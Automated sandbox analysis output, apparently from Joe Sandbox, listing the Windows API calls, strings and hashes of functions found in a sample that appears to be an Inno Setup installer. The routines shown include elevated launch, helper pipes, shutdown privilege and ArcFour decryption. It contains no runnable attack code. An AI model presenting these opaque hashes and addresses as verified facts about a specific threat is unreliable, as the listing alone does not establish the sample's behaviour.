                                                                                                      • Opcode ID: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                                      • Instruction ID: 41a6872630840156d23f43a697f0b10540748f54e9aa1b8241e7bbe25a2b1888
                                                                                                      • Opcode Fuzzy Hash: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                                      • Instruction Fuzzy Hash: 73517574E002099FDB00EFA9C892AAFBBF5EB49314F50817AE500E7351DB389D41CB98
                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                                      • Instruction ID: 3312bc658de40493dbbbdb628fa1ac862c14c743cb2aabe02eeb7d71ec829e14
                                                                                                      • Opcode Fuzzy Hash: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                                      • Instruction Fuzzy Hash: D5115A752007059BCB20DF19D880B82FBE5EF98390F10C53BE9688B385D3B4E8458BA9
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00000000,0045302D), ref: 0045300F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 1452528299-0
                                                                                                      • Opcode ID: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                                      • Instruction ID: b902f5f71593d0acd8113edc39c0d5725662cc955bae9521e0e34912f41e4d76
                                                                                                      • Opcode Fuzzy Hash: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                                      • Instruction Fuzzy Hash: 850170356042486FC701DF699C008EEFBE8EB4D76171082B7FC24C3382D7345E059664
                                                                                                      APIs
                                                                                                      • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00003AD0,00007AD3,00401973), ref: 00401766
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1263568516-0
                                                                                                      • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                                      • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                                                      • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                                      • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 2962429428-0
                                                                                                      • Opcode ID: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                                      • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                                      • Opcode Fuzzy Hash: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                                      • Instruction Fuzzy Hash:
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                                      • SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                                      • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                                      • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                                      • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                                      • FreeLibrary.KERNEL32(00000001,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F26F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                                      • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                                      • API String ID: 2323315520-3614243559
                                                                                                      • Opcode ID: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                                      • Instruction ID: e724c2aa341d6685c6ab1c4031cb88844a897dd828fe35f3324890dc483947ec
                                                                                                      • Opcode Fuzzy Hash: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                                      • Instruction Fuzzy Hash: 8E314FB2640700ABEB01EBB9AC46A6B3794F328724741093FB508D7192D77C5C55CF5C
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 0045862F
                                                                                                      • QueryPerformanceCounter.KERNEL32(02153858,00000000,004588C2,?,?,02153858,00000000,?,00458FBE,?,02153858,00000000), ref: 00458638
                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(02153858,02153858), ref: 00458642
                                                                                                      • GetCurrentProcessId.KERNEL32(?,02153858,00000000,004588C2,?,?,02153858,00000000,?,00458FBE,?,02153858,00000000), ref: 0045864B
                                                                                                      • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004586C1
                                                                                                      • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02153858,02153858), ref: 004586CF
                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458717
                                                                                                      • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045886D,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458750
                                                                                                        • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004587F9
                                                                                                      • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045882F
                                                                                                      • CloseHandle.KERNEL32(000000FF,00458874,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458867
                                                                                                        • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                                      • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                                      • API String ID: 770386003-3271284199
                                                                                                      • Opcode ID: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                                      • Instruction ID: 54c9584e853abf465b9d0f30fdd509929e5717807e8393d963d4681616065440
                                                                                                      • Opcode Fuzzy Hash: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                                      • Instruction Fuzzy Hash: 19710470A003449EDB11EB65CC45B9E77F4EB05705F1085BAF904FB282DB7899488F69
                                                                                                      APIs
                                                                                                        • Part of subcall function 00478370: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02152BD8,?,?,?,02152BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                                        • Part of subcall function 00478370: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                                        • Part of subcall function 00478370: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02152BD8,?,?,?,02152BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                                        • Part of subcall function 00478370: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02152BD8,?,?,?,02152BD8), ref: 004783CC
                                                                                                        • Part of subcall function 00478370: CloseHandle.KERNEL32(00000000,?,?,?,02152BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                                        • Part of subcall function 00478448: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004784DA,?,?,?,02152BD8,?,0047853C,00000000,00478652,?,?,-00000010,?), ref: 00478478
                                                                                                      • ShellExecuteEx.SHELL32(0000003C), ref: 0047858C
                                                                                                      • GetLastError.KERNEL32(00000000,00478652,?,?,-00000010,?), ref: 00478595
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004785E2
                                                                                                      • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478606
                                                                                                      • CloseHandle.KERNEL32(00000000,00478637,00000000,00000000,000000FF,000000FF,00000000,00478630,?,00000000,00478652,?,?,-00000010,?), ref: 0047862A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                                      • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                                      • API String ID: 883996979-221126205
                                                                                                      • Opcode ID: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                                                                      • Instruction ID: b05a94d88e1d9ee0fbafe330a65326fe691daae9ca7e583bddfe233bc85c86e1
                                                                                                      • Opcode Fuzzy Hash: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                                                                      • Instruction Fuzzy Hash: 0E314470A40208BEDB11EFE6C859ADEB7B8EB45718F50843FF508E7281DA7C99058B5D
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229F4
                                                                                                      • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BBE), ref: 00422A04
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendShowWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1631623395-0
                                                                                                      • Opcode ID: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                                      • Instruction ID: 9e9026b6a08d43f4c34b0c014f83afec13b9727198b5f0eb67f7172f0d04fbcb
                                                                                                      • Opcode Fuzzy Hash: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                                      • Instruction Fuzzy Hash: 90915171B04214BFDB11EFA9DA86F9D77F4AB04304F5500BAF504AB392CB78AE419B58
                                                                                                      APIs
                                                                                                      • IsIconic.USER32(?), ref: 00418393
                                                                                                      • GetWindowPlacement.USER32(?,0000002C), ref: 004183B0
                                                                                                      • GetWindowRect.USER32(?), ref: 004183CC
                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 004183DA
                                                                                                      • GetWindowLongA.USER32(?,000000F8), ref: 004183EF
                                                                                                      • ScreenToClient.USER32(00000000), ref: 004183F8
                                                                                                      • ScreenToClient.USER32(00000000,?), ref: 00418403
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                      • String ID: ,
                                                                                                      • API String ID: 2266315723-3772416878
                                                                                                      • Opcode ID: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                                      • Instruction ID: 8875a2d430ef8be2c5346fa25315cde737655516302bc4d2344e38a88124d083
                                                                                                      • Opcode Fuzzy Hash: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                                      • Instruction Fuzzy Hash: 2B112B71505201ABEB00DF69C885F9B77E8AF48314F04067EFD58DB296D738D900CB65
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
                                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00455612
                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455639
                                                                                                      • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045563E
                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 0045564F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                      • API String ID: 107509674-3733053543
                                                                                                      • Opcode ID: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                                      • Instruction ID: 23182b732e3c774e917f784577cc733395bd6f0e504c2650860deaf78f25ff04
                                                                                                      • Opcode Fuzzy Hash: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                                      • Instruction Fuzzy Hash: CBF0C870294B41B9EA10A6718C17F3B21C89B40709F80083ABD05E90D3D7BDD40C4A2E
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D191
                                                                                                      • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D1A1
                                                                                                      • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D1B1
                                                                                                      • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F96F,00000000,0047F998), ref: 0045D1D6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$CryptVersion
                                                                                                      • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                                      • API String ID: 1951258720-508647305
                                                                                                      • Opcode ID: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                                      • Instruction ID: d394b6b565b4a55a8c16e24b867b534ad65140704dc94b035c924c7661ebf9a3
                                                                                                      • Opcode Fuzzy Hash: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                                      • Instruction Fuzzy Hash: A2F030B0D41700CAD318EFF6AC957263B96EB9830AF14C03BA414C51A2D7794454DF2C
                                                                                                      APIs
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0,?,?,00000000,0049B628), ref: 004980FB
                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049817E
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000), ref: 00498196
                                                                                                      • FindClose.KERNEL32(000000FF,004981C1,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0), ref: 004981B4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFind$AttributesCloseFirstNext
                                                                                                      • String ID: isRS-$isRS-???.tmp
                                                                                                      • API String ID: 134685335-3422211394
                                                                                                      • Opcode ID: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                                      • Instruction ID: fc6fb5a4e2302b333323d0d019d05182e8323e6fc1a1653111c694b95695a562
                                                                                                      • Opcode Fuzzy Hash: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                                      • Instruction Fuzzy Hash: E1316A719016186FCF10EF69CC42ADEBBBCDB45314F5044BBA808E3291DA3C9F458E58
                                                                                                      APIs
                                                                                                      • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457611
                                                                                                      • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457638
                                                                                                      • SetForegroundWindow.USER32(?), ref: 00457649
                                                                                                      • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457921,?,00000000,0045795D), ref: 0045790C
                                                                                                      Strings
                                                                                                      • Cannot evaluate variable because [Code] isn't running yet, xrefs: 0045778C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                                      • String ID: Cannot evaluate variable because [Code] isn't running yet
